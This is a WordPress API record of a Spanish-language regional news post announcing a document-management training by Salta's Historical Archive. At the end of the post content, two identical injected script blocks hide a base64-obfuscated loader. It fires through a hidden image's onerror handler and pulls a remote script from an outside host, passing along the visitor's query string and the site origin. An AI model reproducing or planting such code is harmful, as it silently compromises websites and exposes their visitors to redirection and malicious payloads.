{"id":2863,"date":"2023-07-17T19:50:00","date_gmt":"2023-07-17T22:50:00","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2863"},"modified":"2025-08-14T00:12:36","modified_gmt":"2025-08-14T03:12:36","slug":"el-archivo-historico-de-la-provincia-brindara-una-capacitacion-en-rosario-de-la-frontera","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2863","title":{"rendered":"El Archivo Hist\u00f3rico de la Provincia brindar\u00e1 una capacitaci\u00f3n en Rosario de la Frontera"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#a1042b\"><em>Los d\u00edas 24 y 25 de julio, a partir de las 9, en la Biblioteca Domingo F. Sarmiento, tendr\u00e1 lugar la capacitaci\u00f3n en Gesti\u00f3n Documental, con modalidad presencial y entrega de certificados.<\/em><\/h4>\n\n\n\n<p>El&nbsp;<strong>Archivo Hist\u00f3rico de la Provincia<\/strong>&nbsp;inicia su ciclo de capacitaci\u00f3n en gesti\u00f3n documental en Rosario de la Frontera. En el a\u00f1o 2021, este organismo dio su primera capacitaci\u00f3n virtual, la cual se reforz\u00f3 en 2022 con la presencia de archivos administrativos e hist\u00f3ricos de los tres poderes del estado.<\/p>\n\n\n\n<p>En 2023 se planific\u00f3 la capacitaci\u00f3n en territorio, abordando los municipios del norte, sur y oeste de la Provincia. La misma comenzar\u00e1 el 24 y 25 de julio con los municipios del sur provincial en la Biblioteca Popular Nacional Domingo F. Sarmiento de la localidad de Rosario de la Frontera, Melchora Figueroa de Cornejo 521 a partir de las 9.<\/p>\n\n\n\n<p>La capacitaci\u00f3n aborda la vida del documento desde su inicio como documento administrativo hasta su posible guarda como documento hist\u00f3rico. Se trabaja sobre soportes papel, sonoro y audiovisual colaborando con los municipios en el dise\u00f1o de un flujo de trabajo sobre el documento previendo sus condiciones de guarda y consulta.<\/p>\n\n\n\n<p>La actividad est\u00e1 destinada a bibliotecarios en los municipios de Met\u00e1n, La Candelaria, R\u00edo Piedras, El Tala, El Potrero, El Jard\u00edn y Rosario de la Frontera, cuenta con entrada libre y gratuita, sin l\u00edmite de edad.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-archivo-historico-de-la-provincia-brindara-una-capacitacion-en-rosario-de-la-frontera-90664\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los d\u00edas 24 y 25 de julio, a partir de las 9, en la Biblioteca Domingo F. Sarmiento, tendr\u00e1 lugar la capacitaci\u00f3n en Gesti\u00f3n Documental, con modalidad presencial y entrega de certificados. El&nbsp;Archivo Hist\u00f3rico de la Provincia&nbsp;inicia su ciclo de capacitaci\u00f3n en gesti\u00f3n documental en Rosario de la Frontera. En el a\u00f1o 2021, este organismo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2864,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-2863","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2863"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2863"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2863\/revisions"}],"predecessor-version":[{"id":7023,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2863\/revisions\/7023"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2864"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2863"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2863"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2863"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}